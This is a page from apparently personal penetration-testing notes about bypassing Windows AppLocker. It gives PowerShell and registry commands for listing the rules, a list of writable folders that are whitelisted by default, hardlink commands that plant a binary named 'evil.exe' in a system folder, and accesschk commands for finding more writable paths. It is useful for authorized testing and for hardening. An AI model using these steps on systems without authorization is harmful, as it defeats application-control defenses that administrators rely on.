Infrastructure penetration testing notes

Applocker

advances the app control features and functionality of Software Restriction Policies.

PreviousWindows utilities NextRestricted shells

Last updated 4 years ago

Was this helpful?

Applocker

advances the app control features and functionality of Software Restriction Policies.

AppLocker advances the app control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny apps from running based on unique identities of files and to specify which users or groups can run those apps.

Applocker prevent message look like this:

Program 'a.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator At line:1 char:1

View AppLocker policy

User has a folder which is exempt from AppLocker Policy

(Get-AppLockerPolicy -Local).RuleCollections 
or
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse 
or
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\560d03c2-b277-4331-8c59-bc7d4eb08359

PowerShell

There is a powershell module named AppLocker, which can query the AppLocker rules that are enforced on the current system. Below is a simple powershell script that outputs the rules in a readable format so you can use this information to bypass them.

Import-Module AppLocker
[xml]$data = Get-AppLockerPolicy -effective -xml

# Extracts All Rules and print them.
Write-Output "[+] Printing Applocker Rules [+]`n"
($data.AppLockerPolicy.RuleCollection | ? { $_.EnforcementMode -match "Enabled" }) | ForEach-Object -Process {
    Write-Output ($_.FilePathRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Path Rule ===`n`n Rule Name : $($_.Name) `n Condition : $($_.Conditions.FilePathCondition.Path)`n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FileHashRule) | ForEach-Object -Process { Write-Output "=== File Hash Rule ===`n`n Rule Name : $($_.Name) `n File Name :  $($_.Conditions.FileHashCondition.FileHash.SourceFileName) `n Hash type : $($_.Conditions.FileHashCondition.FileHash.Type) `n Hash :  $($_.Conditions.FileHashCondition.FileHash.Data) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FilePublisherRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Publisher Rule ===`n`n Rule Name : $($_.Name) `n PublisherName : $($_.Conditions.FilePublisherCondition.PublisherName) `n ProductName : $($_.Conditions.FilePublisherCondition.ProductName) `n BinaryName : $($_.Conditions.FilePublisherCondition.BinaryName) `n BinaryVersion Min. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.LowSection) `n BinaryVersion Max. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.HighSection) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
}

Bypass

By default allows execution of anything in:

%WINDIR%\*

%PROGRAMFILES%\*

Folders which are whitelisted

C:\Windows\Tasks  
C:\Windows\Temp  
C:\windows\tracing 
C:\Windows\Registration\CRMLog 
C:\Windows\System32\FxsTmp 
C:\Windows\System32\com\dmp 
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 
C:\Windows\System32\spool\PRINTERS 
C:\Windows\System32\spool\SERVERS 
C:\Windows\System32\spool\drivers\color 
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\FxsTmp 
C:\Windows\SysWOW64\com\dmp 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

if you can place a file or folder into the path you become the owner of that object and you can change the ACL either in GUI or using ICALS. That includes adding Execute rights and more. If deny execute is inherit you can either disable inheritance or you can use hardlink to a binary file in another folder using one of these commands:

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

You can check the for additional paths by running accesschk from sysinternals and supplying these commands:

accesschk -w -s -q -u Users "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Everyone "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Interactive "C:\Program Files" >> programfiles.txt 

accesschk -w -s -q -u Users "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Everyone "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Interactive "C:\Program Files (x86)" >> programfilesx86.txt 

accesschk -w -s -q -u Users "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Everyone "C:\Windows" >> windows.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Interactive "C:\Windows" >> windows.txt

Tools

Resources